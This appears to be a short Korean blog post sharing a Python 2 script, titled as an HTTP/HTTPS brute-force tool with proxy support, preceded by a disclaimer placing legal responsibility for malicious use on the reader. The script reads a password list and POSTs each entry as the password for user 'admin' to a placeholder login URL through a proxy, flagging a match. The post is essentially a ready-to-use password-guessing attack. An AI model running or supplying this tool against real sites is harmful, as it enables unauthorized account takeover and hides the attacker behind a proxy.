Notice : 해당 자료가 저작권등에 의해서 문제가 있다면 바로 삭제하겠습니다.
연구목적으로 사용하지 않고 악의적인 목적으로 이용할 경우 발생할 수 있는 법적은 책임은 모두 본인에게 있습니다.
python brute force http, https with proxy
# -*- coding: utf-8 -*- import urllib, urllib2, optparse, time opener = urllib2.build_opener( urllib2.HTTPHandler(), urllib2.HTTPSHandler(), urllib2.ProxyHandler({'http': 'http://proxy_url:port', 'https': 'http://proxy_url:port'})) urllib2.install_opener(opener) def post_request(url, params) : param = urllib.urlencode(params) request = urllib2.Request(url, param) response = urllib2.urlopen(request) response_info = response.info() response_html = response.read() response.close() if response_html.find('用'.decode('gb2312').encode('utf-8'), 0, 100) : print(" .") else : print("found password!!") def get_request(url) : response = urllib2.urlopen(url) response_info = response.info() response_html = response.read() response.close() def main(): parser = optparse.OptionParser('usage bf.py -f passwordfile') parser.add_option('-f', dest='filename', type='string', help='input file') (options, args) = parser.parse_args() filename = options.filename if filename == None : print parser.usage exit(0) f = file(filename, 'r') while True: line = f.readline() if not line : # file end break else : print ("passwd : " + line.rstrip('\n')) post_url = "https://target.domain/path/login.action" post_params = { 'paraam1':'test', 'UserId':'admin', 'UserPass':line.rstrip('\n') } post_request(post_url, post_params) time.sleep(1) if __name__ == '__main__': main()